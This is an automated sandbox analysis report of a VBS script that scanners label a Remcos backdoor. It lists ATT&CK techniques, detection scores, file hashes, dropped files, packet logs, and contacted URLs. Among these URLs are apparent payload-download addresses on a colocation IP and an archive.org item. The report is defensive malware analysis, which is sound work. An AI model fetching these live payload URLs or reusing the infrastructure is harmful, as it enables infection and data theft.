              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Command and Scripting Interpreter              		221
              Scripting              		11
              Process Injection              		31
              Virtualization/Sandbox Evasion              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              kz1fEn2R9Z.vbs26%ReversingLabsScript-WScript.Backdoor.Remcos
              kz1fEn2R9Z.vbs13%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://aka.ms/pscore60%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ia600100.us.archive.org
              		207.241.227.240
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://104.168.32.148/345/CHPPZA.txtfalse
                  		unknown
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Contentpowershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://go.microsoft.copowershell.exe, 00000003.00000002.1754168405.000001A61E3C6000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://go.micropowershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://oneget.orgXpowershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://ia600100.us.arXzpowershell.exe, 00000003.00000002.1754476864.000001A61FEB5000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://ia600100.us.archive.orgpowershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://aka.ms/pscore6powershell.exe, 00000001.00000002.1801623265.000001B680053000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1801623265.000001B68006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://104.168.32.148powershell.exe, 00000003.00000002.1754476864.000001A61EC0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1801623265.000001B680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://oneget.orgpowershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://ia600100.us.archive.orgpowershell.exe, 00000003.00000002.1754476864.000001A61FEBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.168.32.148
                                      		unknownUnited States
                                      		36352AS-COLOCROSSINGUSfalse
                                      207.241.227.240
                                      		ia600100.us.archive.orgUnited States
                                      		7941INTERNET-ARCHIVEUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1523834
                                      Start date and time:2024-10-02 05:29:44 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 8s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:kz1fEn2R9Z.vbs
                                      renamed because original name is a hash value
                                      Original Sample Name:80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winVBS@6/5@1/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 7
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7768 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      23:30:38API Interceptor46x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.168.32.148Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                                      • 104.168.32.148/610/RGBVV.txt
                                      C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                      • 104.168.32.148/550/RWEER.txt
                                      PO.xlsGet hashmaliciousRemcosBrowse
                                      • 104.168.32.148/550/RWEER.txt
                                      LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                      • 104.168.32.148/345/CHPPZA.txt
                                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      • 104.168.32.148/345/CHPPZA.txt
                                      207.241.227.2401iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                        aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                          vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                            f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                  ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                                    0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                      PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ia600100.us.archive.orgaK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          INTERNET-ARCHIVEUS1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          AS-COLOCROSSINGUSuLfuBVyZFV.vbsGet hashmaliciousUnknownBrowse
                                                          • 198.46.129.134
                                                          2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                                                          • 107.172.130.147
                                                          0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 107.172.148.248
                                                          CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                                                          • 23.95.182.47
                                                          8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                                                          • 23.95.182.47
                                                          CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                                                          • 23.95.182.47
                                                          8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                                                          • 23.95.182.47
                                                          CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                          • 172.245.123.6
                                                          Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                                                          • 104.168.32.148
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtfGet hashmaliciousRemcosBrowse
                                                          • 104.168.7.8

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0e1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          uLfuBVyZFV.vbsGet hashmaliciousUnknownBrowse
                                                          • 207.241.227.240
                                                          aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                                                          • 207.241.227.240
                                                          WW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                                                          • 207.241.227.240
                                                          89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                                          • 207.241.227.240
                                                          2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                                                          • 207.241.227.240
                                                          iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                                                          • 207.241.227.240

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulv4iZ:NllUg
                                                          MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                                                          SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                                                          SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                                                          SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:@...e.................................~..............@..........

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afqypkfk.t2c.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw3zflkn.xpi.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kskqlwo2.umr.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mot0inmo.pxr.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          Static File Info

                                                          General

                                                          File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Entropy (8bit):3.765032305777867
                                                          TrID:
                                                          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                          • MP3 audio (1001/1) 32.22%
                                                          • Lumena CEL bitmap (63/63) 2.03%
                                                          • Corel Photo Paint (41/41) 1.32%
                                                          File name:kz1fEn2R9Z.vbs
                                                          File size:260'242 bytes
                                                          MD5:10a145cb87654a33c6c0beda947466b8
                                                          SHA1:a504192f1b5ac44e6e49b4bc9ef660220c604469
                                                          SHA256:80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03
                                                          SHA512:fbc4f71668b7af09338ae7060c04dd8feed091b3b7adb490647c92d731cefca4b1e929d36f750563ff0afa14b797984625eaf964f25a3f71b597343d79ec891a
                                                          SSDEEP:3072:LwUs2qx9vFgTOuYTLaGHcntHONrLgt5psGwH7Hkyb9qGjK6Heo7sQ5CoBAlbjZft:MUgvFgTfYiGHs2/2Gj+ULIoSVZ+zO
                                                          TLSH:BE44080225EA7008F1F32F525AF955F94F6BB9652939922D648C1B0F1BE3E80CD51BB3
                                                          File Content Preview:..........f.G.U.W.L.a.C.k.k.R.k.W.c.W.a.l.K.J.z.c.K.L.t.L.z. .=. .".d.T.b.A.p.U.N.c.K.A.p.S.K.L.f.U.H.z.K.b.f.c.o.U.l.".....L.P.B.n.c.L.i.u.e.G.e.k.q.T.c.a.n.t.i.s.s.o.c.i.a.l.i.s.t.a.L.P.p.O.B.P.h.e. .=. .".K.z.l.A.Q.S.K.q.Z.m.e.L.p.t.a.c.a.e.e.A.W.u.o.o

                                                          File Icon

                                                          Icon Hash:68d69b8f86ab9a86

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 2, 2024 05:30:39.411379099 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:39.411443949 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:39.411545038 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:39.421103001 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:39.421123981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.016565084 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.016834021 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.020977974 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.021013975 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.021392107 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.060187101 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.103420019 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306261063 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306287050 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306293964 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306338072 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306360006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306385994 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.306435108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.306452990 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.306487083 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.325750113 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.325778008 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.325860977 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.325886011 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.325927973 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.374174118 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.374200106 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.374254942 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.374303102 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.374321938 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.374342918 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.411895037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.411922932 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.412080050 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.412126064 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.412173033 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.442137957 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.442164898 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.442373991 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.442413092 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.442470074 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.443139076 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.443156958 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.443226099 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.443234921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.443276882 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.509804010 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.509829998 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.509979963 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.510020971 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.510107040 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.510988951 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.511007071 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.511085987 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.511104107 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.511149883 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.577411890 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.577442884 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.577549934 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.577580929 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.577686071 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.578536034 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.578561068 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:40.578648090 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:40.578670025 CEST44349730207.241.227.240192.168.2.4
